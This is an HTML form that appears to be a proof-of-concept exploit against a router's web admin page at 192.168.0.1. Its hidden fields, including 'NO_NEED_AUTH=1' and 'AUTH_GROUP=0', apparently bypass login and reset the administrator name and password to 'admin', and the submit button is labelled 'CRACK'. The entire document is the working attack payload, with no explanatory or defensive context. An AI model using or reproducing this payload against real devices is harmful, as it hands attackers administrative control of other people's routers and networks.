<form action="http://192.168.0.1/tools_admin.php" method="POST">
 <input type="hidden" name="ACTION_POST" value="LOGIN" />
 <input type="hidden" name="LOGIN_USER" value="a" />
 <input type="hidden" name="LOGIN_PASSWD" value="b" />
 <input type="hidden" name="login" value="+Log+In+" />
 <input type="hidden" name="NO_NEED_AUTH" value="1" />
 <input type="hidden" name="AUTH_GROUP" value="0" />
 Login:
 <input type="text" name="admin_name" value="admin" />
 Password:
 <input type="text" name="admin_password1" value="admin" />
 <input type="submit" value="CRACK" />
</form>